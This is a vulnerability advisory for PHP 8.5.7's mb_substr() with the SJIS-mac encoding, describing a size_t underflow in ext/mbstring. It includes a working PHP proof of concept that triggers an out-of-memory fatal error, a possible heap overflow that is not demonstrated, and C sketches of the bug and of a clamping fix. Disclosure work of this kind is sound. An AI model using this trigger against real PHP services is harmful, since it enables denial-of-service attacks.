# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact
## Description
The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately skips its early empty-string return for the `SJIS-mac`
encoding when `from >= in_len`. The call therefore falls through to
`mb_get_substr_slow()`, which begins with
`mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);`. When
`from > in_len`, the expression `in_len - from` underflows `size_t`
and yields a requested buffer size close to 2^64 bytes, which triggers
an immediate Out-Of-Memory (OOM) fatal error. Furthermore, if
`_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, the allocation
could end up tiny while the buffer limit is still computed from the
underflowed size, which could result in a heap buffer overflow when
subsequent codepoints are decoded and written.
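
The arithmetic can be reproduced outside PHP. The following is a minimal sketch, not the mbstring source: the function names and `SKETCH_ZSTR_HEADER_SIZE` are hypothetical, and the 24-byte header is an assumption about a typical 64-bit build, with `_ZSTR_STRUCT_SIZE` modelled as header plus length plus one terminating byte.

```c
#include <stddef.h>
#include <stdint.h>

/* ASSUMPTION: size of the zend_string header that precedes the character
 * data on a typical 64-bit build. Hypothetical constant for illustration. */
#define SKETCH_ZSTR_HEADER_SIZE ((size_t)24)

/* Models MIN(len, in_len - from) with no bounds check. The subtraction is
 * unsigned, so it wraps modulo SIZE_MAX + 1 whenever from > in_len. */
size_t sketch_init_size(size_t in_len, size_t from, size_t len)
{
    size_t remaining = in_len - from;
    return len < remaining ? len : remaining;
}

/* Models header + initsize + 1 (terminating NUL). This addition is also
 * unsigned and wraps when initsize is within 25 bytes of SIZE_MAX. */
size_t sketch_struct_size(size_t initsize)
{
    return SKETCH_ZSTR_HEADER_SIZE + initsize + 1;
}
```

Under these assumptions, and treating an omitted length as a very large value such as `SIZE_MAX`, `sketch_init_size(3, 1000000, SIZE_MAX)` evaluates to 18446744073708551619 on a 64-bit build, and `sketch_struct_size()` of that value is 18446744073708551644, the figure reported in the PoC's fatal error. With `from = in_len + 1` the initial size is `SIZE_MAX` and `sketch_struct_size(SIZE_MAX)` wraps to 24, which is the tiny-allocation case.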
## Proof of concept
```php
<?php
/*
 * PoC: mb_substr() 'SJIS-mac' size_t underflow
 * File: ext/mbstring/mbstring.c, mb_get_substr() (~L2129) and
 *       mb_get_substr_slow() (~L2102)
 *
 * mb_get_substr() deliberately skips the early "return empty" guard for SJIS-mac:
 *
 *   if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
 *       return zend_empty_string;  // <-- sjis_mac bypasses this when from >= in_len
 *   }
 *
 * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
 * mb_get_substr_slow(), whose first line is:
 *
 *   mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
 *
 * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
 * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
 *
 * Two outcomes, both wrong (correct result is the empty string):
 *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
 *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
 *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
 *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
 *      while buf->limit = out + initsize stays wild -> a subsequent write of
 *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
 *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
 *      from < codepoint_count while from > byte_count. Worth upstream review.)
 */
echo "PHP ", PHP_VERSION, " sjis_mac available: ",
    (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";

/* Control: a normal encoding with from > strlen returns "" cleanly. */
echo "UTF-8, from=10 > strlen('abc'): -> ";
var_dump(@mb_substr("abc", 10, null, "UTF-8"));

/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
 * On a 64-bit build, "tried to allocate 18...644 bytes" is (size_t)(3 - 1000000)
 * = 18446744073708551619 plus the 25 bytes that _ZSTR_STRUCT_SIZE() adds. */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");

/* A fatal error ends the script, and `@` does not prevent that, so this
 * line is reached only when the call above did not hit the OOM. */
echo "(if you see this line, no fatal error occurred in the call above)\n";
```
## Impact
An attacker who can supply a start offset with `from > in_len`
together with the 'SJIS-mac' encoding can trigger the `size_t`
underflow. This reliably causes an Out-Of-Memory (OOM) fatal error,
resulting in a Denial of Service. Depending on the environment, it
might also lead to a heap buffer overflow, although that outcome has
not been demonstrated.
## Solution
Tighten the checks in `mb_get_substr()` and `mb_get_substr_slow()` in
`ext/mbstring/mbstring.c`. The subtraction `in_len - from` should be
bounds-checked so that the function either returns early or clamps
the result to zero when `from > in_len`, avoiding the underflow when
the output buffer is initialized.
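
One way to express the clamp-to-zero option is a saturating subtraction. The following is a sketch under stated assumptions, not a proposed upstream patch: both helper names are hypothetical and nothing here is taken from the mbstring source. Clamping, rather than returning early, leaves room for the SJIS-mac case noted in the PoC where an input decodes to more codepoints than it has bytes.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: bytes remaining after offset `from`,
 * saturating at 0 instead of wrapping when from >= in_len. */
size_t sketch_remaining(size_t in_len, size_t from)
{
    return from < in_len ? in_len - from : 0;
}

/* Hypothetical stand-in for MIN(len, in_len - from) that cannot
 * underflow: the initial buffer size never exceeds in_len. */
size_t sketch_safe_init_size(size_t in_len, size_t from, size_t len)
{
    size_t remaining = sketch_remaining(in_len, from);
    return len < remaining ? len : remaining;
}
```

With the PoC's values, `sketch_safe_init_size(3, 1000000, SIZE_MAX)` returns 0 rather than a value near 2^64. Whether a zero initial size is acceptable depends on how the conversion buffer grows during decoding, which this sketch does not model.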